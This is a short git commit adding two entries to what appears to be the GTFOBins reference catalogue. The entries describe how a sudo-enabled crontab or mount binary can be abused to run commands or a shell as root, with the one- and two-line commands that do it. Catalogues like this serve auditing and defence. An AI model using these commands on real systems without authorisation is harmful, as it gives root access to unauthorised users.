added crontab and mount

This commit is contained in:
kk 2018-07-16 10:00:14 +02:00
parent d6895f367d
commit 85b99ce89f
2 changed files with 15 additions and 0 deletions

7
_gtfobins/crontab.md Normal file
View File

@ -0,0 +1,7 @@
---
functions:
sudo-enabled:
- description: edit root's crontab and run arbitrary commands as root.
code: |
sudo crontab -e
---

8
_gtfobins/mount.md Normal file
View File

@ -0,0 +1,8 @@
---
functions:
sudo-enabled:
- description: bind mount bash to the mount binary, as mount is sudo enabled.
code: |
sudo mount -o bind /bin/bash /bin/mount
sudo mount
---